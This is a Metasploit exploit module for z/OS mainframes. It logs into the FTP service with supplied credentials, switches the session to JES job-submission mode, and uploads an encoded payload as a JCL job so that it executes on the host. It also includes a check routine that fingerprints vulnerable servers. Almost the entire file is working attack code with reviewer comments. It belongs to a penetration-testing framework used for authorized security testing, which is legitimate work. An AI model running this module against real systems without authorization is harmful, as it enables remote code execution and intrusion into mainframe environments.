
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/mainframe/ftp/ftp_jcl_creds.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
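# Metasploit module that submits a JCL job to a z/OS host through the FTP
# server's JES interface (`SITE FILE=JES`).
#
# The module logs in with valid FTP credentials (see 'Description') and is
# declared 'Privileged' => false. It therefore relies on an authenticated
# use of the FTP/JES interface rather than on a software flaw; the controls
# that matter on the server side are who may log in over FTP and who may
# submit jobs through it. The `SITE FILE=JES` command followed by an upload
# is the sequence this module produces on the wire.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and its options.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values below through update_info
  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'FTP JCL Execution',
      'Description' => %q{(Submit JCL to z/OS via FTP and SITE FILE=JES.
        This exploit requires valid credentials on the target system)},
      'Author' =>
        [
          'Bigendian Smalls',
          'mainframed a.k.a. soldier of fortran',
          'S&Oxballs a.k.a. chiefascot'
        ],
      'Arch' => ARCH_CMD,
      'License' => MSF_LICENSE,
      'Platform' => ['mainframe'],
      'Privileged' => false,
      'Targets' => [['Automatic', {}]],
      'DisclosureDate' => '2013-05-12',
      # Boolean rather than the string 'true': both are truthy in Ruby, but
      # a string would stay truthy even if someone later wrote 'false'.
      'DisableNops' => true,
      'DefaultTarget' => 0
    ))

    register_options(
      [
        Opt::RPORT(21),
        # NOTE(review): SLEEP is registered here but never read anywhere in
        # this file; confirm whether a mixin uses it before removing it.
        OptInt.new('SLEEP', [ false, "Time to wait before checking if job has completed.", 5 ])
      ], self.class
    )
  end

  # Always true. Presumably tells the framework that the module acts after
  # authentication, which matches the credential requirement stated in the
  # description -- confirm against the framework's use of post_auth?.
  #
  # @return [Boolean]
  def post_auth?
    true
  end

  # Logs in, asks the server to switch to JES mode, then classifies the
  # target from the cached FTP banner and the reply to `SITE FILE=JES`.
  #
  # A failed login is reported as CheckCode::Unknown instead of raising via
  # fail_with, so that a check against an unreachable or non-authenticating
  # host yields a result code rather than an exception.
  #
  # @return [Exploit::CheckCode] Vulnerable when the banner matches and the
  #   SITE reply contains "200 SITE"; Detected when only the banner matches;
  #   Safe when the banner is not recognised; Unknown when login fails
  def check
    unless connect_login
      print_error("#{rhost}:#{rport} - Failed to connect to FTP server")
      return Exploit::CheckCode::Unknown
    end
    print_good("Successfully connected to FTP server.")

    begin
      test_jes = send_cmd(['site', 'file=jes'])
    ensure
      # Close the session even if the command raised; the banner was cached
      # during connect and is still readable afterwards.
      disconnect
    end

    # banner may be nil if the server sent nothing; normalise it so the
    # strip call in the fallback branch cannot raise NoMethodError.
    server_banner = banner.to_s

    case server_banner
    when /IBM FTP CS V.R./
      # Banner looks like the IBM z/OS FTP server; now look at the SITE reply.
      case test_jes
      when /200 SITE/
        print_status("Found IBM z/OS Banner and JES commands accepted")
        Exploit::CheckCode::Vulnerable
      else
        print_error("Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!")
        Exploit::CheckCode::Detected
      end
    else
      # Unrecognised banner: report the target as not applicable.
      print_status("We could not recognize the server banner: #{server_banner.strip}")
      Exploit::CheckCode::Safe
    end
  end

  # Logs in, switches the FTP session to JES mode and uploads the encoded
  # payload as a JCL file, then reports the job number parsed from the
  # server's reply.
  #
  # The reply to `SITE FILE=JES` is now inspected before JES mode is
  # reported as active, and the job-number parse tolerates an empty reply
  # instead of raising NoMethodError.
  #
  # @return [void]
  def exploit
    # fail_with raises, so nothing below runs when the login fails.
    unless connect_login
      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to connect to FTP server")
    end
    print_good("Successfully connected to FTP server.")

    site_reply = send_cmd(['site', 'file=jes'])
    if site_reply.to_s =~ /200 SITE/
      print_good("Successfully switched to JES mode")
    else
      # Do not abort: check() treats this case as "try anyway". Only the
      # status message changes so that the operator log stays accurate.
      print_warning("#{rhost}:#{rport} - SITE FILE=JES was not acknowledged with a 200 reply")
    end

    jcl_file_name = Rex::Text.rand_text_alpha(8).upcase
    print_status("Uploading JCL file: #{jcl_file_name}")

    res = send_cmd_data(['put', jcl_file_name], payload.encoded)
    if res.nil?
      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to upload JCL to FTP server")
    end

    # The job number is taken as the last whitespace-separated token of the
    # first reply line; an empty reply has no first line to parse.
    first_line = res.lines.first
    job_num = first_line ? first_line.split.last : nil
    if job_num
      print_good("Job Submitted. Job number is #{job_num}")
    else
      print_warning("#{rhost}:#{rport} - Upload reply did not contain a job number")
    end

    handler
    disconnect
  end
end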